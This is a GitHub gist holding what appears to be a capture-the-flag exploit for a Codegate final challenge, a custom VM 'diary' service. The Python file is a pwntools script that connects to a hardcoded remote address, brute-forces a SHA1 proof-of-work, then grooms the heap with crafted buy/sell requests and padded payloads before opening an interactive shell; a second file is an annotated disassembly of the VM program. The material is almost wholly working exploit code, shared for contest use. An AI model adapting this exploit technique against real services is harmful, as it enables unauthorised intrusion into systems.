Skip to content

Instantly share code, notes, and snippets.

@yough3rt

yough3rt/z.py

Last active April 10, 2018 07:35
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save yough3rt/bc1f07c489fadf8a88cae53d4b14eaf1 to your computer and use it in GitHub Desktop.
Save yough3rt/bc1f07c489fadf8a88cae53d4b14eaf1 to your computer and use it in GitHub Desktop.
Download ZIP
EXP for Codegate Final _GameBox3 diary
Raw
z.py
#!/usr/bin/env python
# encoding: utf-8
from pwn import *
r = remote("58.229.240.150", 8888)
context.log_level = 'debug'
import random
from hashlib import sha1
r.recvuntil("prefix : ")
prefix = r.recv(6)
print prefix
x = 0
while 1:
x += 1
# x=chr(random.randint(0,0xff))+chr(random.randint(0,0xff))+chr(random.randint(0,0xff))
# y=chr(random.randint(0,0xff))+chr(random.randint(0,0xff))+chr(random.randint(0,0xff))
# z=chr(random.randint(0,0xff))+chr(random.randint(0,0xff))+chr(random.randint(0,0xff))
answer = prefix + str(x)
if not sha1(answer).hexdigest().endswith('000000'):
continue
r.sendline(answer)
break
# r = process("./vm_tiny.py")
def buy(avatar, data = 1):
r.sendlineafter(">", "2")
if data == 0:
r.sendlineafter(">", "n")
return
r.sendlineafter(">", "y")
r.sendline(avatar)
r.recvuntil("new dog")
def sell(index):
r.sendlineafter(">", "3")
r.sendlineafter("which dog do you want to sell?\n>", index)
def p(i):
ret = chr(i & 0b000000000000001111111)
ret += chr((i & 0b111111100000000000000) >> 14)
ret += chr((i & 0b000000011111110000000) >> 7)
return ret
# buy("aaa")
# for i in range(0x100000, 0x100000 + 10 * 0x1000, 0x1000):
sell(p(0x100000))
sell(p(0x110000))
sell(p(0x120000))
sell(p(0x130000))
sell(p(0x140000))
sell(p(0x150000))
for i in range(256):
buy("@".ljust(3600, "z"), 0)
m = "@" + "*" * 300
m = m.ljust(3600, "z")
buy(m, 1)
for i in range(5):
for j in range(60):
r.sendlineafter(">", "d")
r.sendlineafter(">", "s")
r.sendlineafter(">", "s")
r.sendlineafter(">", "1")
# r.recvuntil(">")
r.interactive()
Raw
zzz
0: sp -= 3
5: r2 = 6
10: r1 = sp
12: r0 = 4
17: syscall // malloc
19: r10 = tri*(r1)
21: r0 = 5
26: syscall
28: r9 = r0
30: call 39
35: r0 ^= r0
37: syscall
main():
39: push bp
41: bp = sp
43: sp -= 6
48: r5 = bp
50: r5 -= 3
55: tri*(r5) = r9
57: r0 = 1731
62: call puts
67: call 234
72: r0 = 2471
77: call puts
82: r5 = bp
84: r5 -= 6
89: tri*(r5) = zero
91: r1 = 3
96: r0 = r5
98: call read
103: r5 = bp
105: r5 -= 6
110: low(r6) = low*(r5)
112: cmp low(r6) low(49)
117: jne(!=) 132
122: call 302
127: jmp 207
132: cmp low(r6) low(50)
137: jne(!=) 152
142: call 496
147: jmp 207
152: cmp low(r6) low(51)
157: jne(!=) 172
162: call 793
167: jmp 207
172: cmp low(r6) low(52)
177: jne(!=) 192
182: call 1106
187: jmp 207
192: cmp low(r6) low(53)
197: jne(!=) 207
202: jmp 212
207: jmp 72
212: r5 = bp
214: r5 -= 3
219: r6 = tri*(r5)
221: cmp r6 r9
223: jne(!=) candy_check_failed
228: sp = bp
230: pop bp
232: pop pc
init_memory:
234: push bp
236: bp = sp
238: sp -= 3
243: r5 = bp
245: r5 -= 3
250: tri*(r5) = r9
# *(r10) = 0; memset(r10+3, 0, 30)
252: r5 = r10
254: tri*(r5) = zero
256: r5 = r10
258: r5 += 3
263: r2 = 30
268: r1 = 0
273: r0 = r5
275: call memset
280: r5 = bp
282: r5 -= 3
287: r6 = tri*(r5)
289: cmp r6 r9
291: jne(!=) candy_check_failed
296: sp = bp
298: pop bp
300: pop pc
list():
302: push bp
304: bp = sp
306: sp -= 9
311: r5 = bp
313: r5 -= 3
318: tri*(r5) = r9
-6 count
-9 *)
320: r5 = bp
322: r5 -= 6
327: r6 = 1
332: tri*(r5) = r6
334: r0 = 2262
339: call puts
344: r0 = 2275
349: call puts
354: r5 = bp
356: r5 -= 6
361: r6 = tri*(r5)
363: r5 = r10
365: r7 = tri*(r5)
367: cmp r6 r7
369: jb(>) 464
374: r5 = bp
376: r5 -= 9
381: r7 = r6
383: r7 += 48
388: low*(r5) = r7
390: r5++
392: r7 = 41
397: low*(r5) = r7
399: r5++
401: low*(r5) = zero
403: r5 = bp
405: r5 -= 9
410: r0 = r5
412: call puts
417: r5 = bp
419: r5 -= 6
424: r0 = tri*(r5)
426: call 1716
431: call puts
436: r0 = 2514
441: call puts
446: r5 = bp
448: r5 -= 6
453: r6 = tri*(r5)
455: r6++
457: tri*(r5) = r6
459: jmp 354
464: r0 = 2275
469: call puts
474: r5 = bp
476: r5 -= 3
481: r6 = tri*(r5)
483: cmp r6 r9
485: jne(!=) candy_check_failed
490: sp = bp
492: pop bp
494: pop pc
write():
496: push bp
498: bp = sp
500: sp -= 6
505: r5 = bp
507: r5 -= 3
512: tri*(r5) = r9
514: r5 = r10
516: r6 = tri*(r5)
518: cmp r6 9
523: js(<) 543
528: r0 = 2329
533: call puts
538: jmp 771(ret)
543: r6++
545: tri*(r5) = r6
547: r2 = 6
552: r5 = bp
554: r5 -= 6
559: r1 = r5
561: r0 = 4
566: syscall
568: r5 = bp
570: r5 -= 6
575: r7 = tri*(r5)
577: r5 = r10
579: r8 = r6
581: r8 *= 3
586: r5 += r8
588: tri*(r5) = r7
590: r0 = 2354
595: call puts
600: r5 = bp
602: r5 -= 6
607: r6 = tri*(r5)
609: r1 = 30
614: r0 = r6
616: call read
621: r0--
623: r5 = bp
625: r5 -= 6
630: r6 = tri*(r5)
632: r6 += r0
634: low*(r6) = zero
636: r0 = 2369
641: call puts
646: r5 = bp
648: r5 -= 6
653: r6 = tri*(r5)
655: r6 += 30
660: r1 = 1200
665: r0 = r6
667: call read
672: r0--
674: r5 = bp
676: r5 -= 6
681: r6 = tri*(r5)
683: r6 += 30
688: r6 += r0
690: low*(r6) = zero
692: r5 = bp
694: r5 -= 6
699: r6 = tri*(r5)
701: r6 += 1260
706: r1 = r0
708: r0 = r6
710: call read
715: r5 = bp
717: r5 -= 6
722: r6 = tri*(r5)
724: r7 = r6
726: r6 += 30
731: r7 += 1260
736: r8 ^= r8
738: cmp r8 1200
743: je(==) 771(ret:)
748: r5 ^= r5
750: r4 ^= r4
752: low(r5) = low*(r6)
754: low(r4) = low*(r7)
756: r5 ^= r4
758: low*(r6) = r5
760: r6++
762: r7++
764: r8++
766: jmp 738
771: r5 = bp
773: r5 -= 3
778: r6 = tri*(r5)
780: cmp r6 r9
782: jne(!=) candy_check_failed
787: sp = bp
789: pop bp
791: pop pc
show():
// -6 id
// -9 ptr
793: push bp
795: bp = sp
797: sp -= 1209
802: r5 = bp
804: r5 -= 3
809: tri*(r5) = r9
811: r0 = 2428
816: call puts
821: r1 = 2
826: r5 = bp
828: r5 -= 6
833: r0 = r5
835: call read
840: r6 ^= r6
842: r5 = bp
844: r5 -= 6
849: low(r6) = low*(r5)
851: cmp low(r6) low(49)
856: js(<) 1084
861: cmp low(r6) low(57)
866: jb(>) 1084
871: low(r6) -= low(48)
876: r5 = r10
878: r7 = tri*(r5)
880: cmp r6 r7
882: jb(>) 1084
887: r0 = r6
889: call 1716
894: r5 = bp
896: r5 -= 9
901: tri*(r5) = r0
903: r0 = 2275
908: call puts
913: r0 = 2361
918: call puts
923: r5 = bp
925: r5 -= 9
930: r0 = tri*(r5)
932: call puts // puts title
937: r0 = 2514
942: call puts
947: r0 = 2275
952: call puts
957: r2 = 1200
962: r5 = bp
964: r5 -= 9
969: r5 = tri*(r5)
971: r5 += 30
976: r1 = r5
978: r5 = bp
980: r5 -= 1209
985: r0 = r5
987: call 1497 // memcpy
992: r5 = bp
994: r5 -= 1209
999: r6 = r5
1001: r5 = bp
1003: r5 -= 9
1008: r7 = tri*(r5)
1010: r7 += 1260
1015: r8 ^= r8
1017: cmp r8 1200
1022: je(==) 1050
1027: r5 ^= r5
1029: r4 ^= r4
1031: low(r5) = low*(r6)
1033: low(r4) = low*(r7)
1035: r5 ^= r4
1037: low*(r6) = r5
1039: r6++
1041: r7++
1043: r8++
1045: jmp 1017
1050: r5 = bp
1052: r5 -= 1209
1057: r0 = r5
1059: call puts
1064: r0 = 2514
1069: call puts
1074: r0 = 2275
1079: call puts
1084: r5 = bp
1086: r5 -= 3
1091: r6 = tri*(r5)
1093: cmp r6 r9
1095: jne(!=) candy_check_failed
1100: sp = bp
1102: pop bp
1104: pop pc
edit()
1106: push bp
1108: bp = sp
1110: sp -= 9
1115: r5 = bp
1117: r5 -= 3
1122: tri*(r5) = r9
1124: r0 = 2428 // index
1129: call puts
1134: r1 = 2
1139: r5 = bp
1141: r5 -= 6
1146: r0 = r5
1148: call read
1153: r6 ^= r6
1155: r5 = bp
1157: r5 -= 6
1162: low(r6) = low*(r5)
1164: cmp low(r6) low(49)
1169: js(<) 1415
1174: cmp low(r6) low(57)
1179: jb(>) 1415
1184: low(r6) -= low(48)
1189: r5 = r10
1191: r7 = tri*(r5)
1193: cmp r6 r7
1195: jb(>) 1415
1200: r0 = r6
1202: call 1716 // get content_ptr by index
1207: r5 = bp
1209: r5 -= 9
1214: tri*(r5) = r0
1216: r0 = 2354
1221: call puts
1226: r5 = bp
1228: r5 -= 9
1233: r6 = tri*(r5)
1235: r1 = 30
1240: r0 = r6
1242: call read
1247: r0--
1249: r5 = bp
1251: r5 -= 9
1256: r6 = tri*(r5)
1258: r6 += r0
1260: low*(r6) = zero
1262: r0 = 2405
1267: call puts
1272: r5 = bp
1274: r5 -= 9
1279: r6 = tri*(r5)
1281: r6 += 30
1286: r1 = 1200
1291: r0 = r6
1293: call read
1298: r0--
1300: r5 = bp
1302: r5 -= 9
1307: r6 = tri*(r5)
1309: r6 += 30
1314: r6 += r0
1316: low*(r6) = zero
1318: r0 = 2415 // secret key
1323: call puts
1328: r5 = bp
1330: r5 -= 9
1335: r6 = tri*(r5)
1337: r6 += 1260
1342: r0 = r6
1344: call puts
1349: r0 = 2514 // \n
1354: call puts
1359: r5 = bp
1361: r5 -= 9
1366: r6 = tri*(r5)
1368: r7 = r6
1370: r6 += 30
1375: r7 += 1260
1380: r8 ^= r8
1382: cmp r8 1200
1387: je(==) 1415
1392: r5 ^= r5
1394: r4 ^= r4
1396: low(r5) = low*(r6)
1398: low(r4) = low*(r7)
1400: r5 ^= r4
1402: low*(r6) = r5
1404: r6++
1406: r7++
1408: r8++
1410: jmp 1382
1415: r5 = bp
1417: r5 -= 3
1422: r6 = tri*(r5)
1424: cmp r6 r9
1426: jne(!=) candy_check_failed
1431: sp = bp
1433: pop bp
1435: pop pc
candy_check_failed:
1437: r0 = 2436
1442: call puts
1447: r0 ^= r0
1449: syscall
memset(char *, int, size_t)
1451: push r0
1453: push r1
1455: push r2
1457: push r9
1459: cmp r2 0
1464: je(==) 1480
1469: low*(r0) = r1
1471: r0++
1473: r2--
1475: jmp 1459
1480: pop r6
1482: cmp r6 r9
1484: jne(!=) candy_check_failed
1489: pop r2
1491: pop r1
1493: pop r0
1495: pop pc
memcpy()
1497: push r0
1499: push r1
1501: push r2
1503: push r3
1505: push r9
1507: cmp r2 0
1512: je(==) 1532
1517: low(r3) = low*(r1)
1519: low*(r0) = r3
1521: r0++
1523: r1++
1525: r2--
1527: jmp 1507
1532: pop r6
1534: cmp r6 r9
1536: jne(!=) candy_check_failed
1541: pop r3
1543: pop r2
1545: pop r1
1547: pop r0
1549: pop pc
void read(char *, int):
1551: push r1
1553: push r2
1555: push r3
1557: push r9
1559: r3 = r1
1561: r2 = r0
1563: r1 = 0
1568: r0 = 3
1573: syscall
1575: pop r6
1577: cmp r6 r9
1579: jne(!=) candy_check_failed
1584: pop r3
1586: pop r2
1588: pop r1
1590: pop pc
void write(char *, int):
1592: push r1
1594: push r2
1596: push r3
1598: push r9
1600: r3 = r1
1602: r2 = r0
1604: r1 = 1
1609: r0 = 2
1614: syscall
1616: pop r6
1618: cmp r6 r9
1620: jne(!=) candy_check_failed
1625: pop r3
1627: pop r2
1629: pop r1
1631: pop pc
void puts(char *):
1633: push r0
1635: push r1
1637: push r9
1639: r1 = r0
1641: call strlen
1646: exchange r1 r0
1648: call write
1653: pop r6
1655: cmp r6 r9
1657: jne(!=) candy_check_failed
1662: pop r1
1664: pop r0
1666: pop pc
int strlen(char *):
1668: push r1
1670: push r2
1672: push r9
1674: r1 ^= r1
1676: r2 ^= r2
1678: low(r2) = low*(r0)
1680: cmp low(r2) low(0)
1685: je(==) 1699
1690: r0++
1692: r1++
1694: jmp 1678
1699: pop r6
1701: cmp r6 r9
1703: jne(!=) candy_check_failed
1708: r0 = r1
1710: pop r2
1712: pop r1
1714: pop pc
get_content():
1716: r5 = r10
1718: r6 = r0
1720: r6 *= 3
1725: r5 += r6
1727: r0 = tri*(r5)
1729: pop pc
1731: bp *= pc
1733: bp *= pc
1735: bp *= pc
1737: bp *= pc
1739: bp *= pc
1741: bp *= pc
1743: bp *= pc
1745: bp *= pc
1747: bp *= pc
1749: bp *= pc
1751: bp *= pc
1753: bp *= pc
1755: bp *= pc
1757: bp *= pc
1759: bp *= pc
1761: bp *= pc
1763: bp *= pc
1765: bp *= pc
1767: bp *= pc
1769: bp *= pc
1771: bp *= pc
1773: bp *= pc
1775: bp *= pc
1777: bp *= pc
1779: bp *= pc
1781: bp *= pc
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment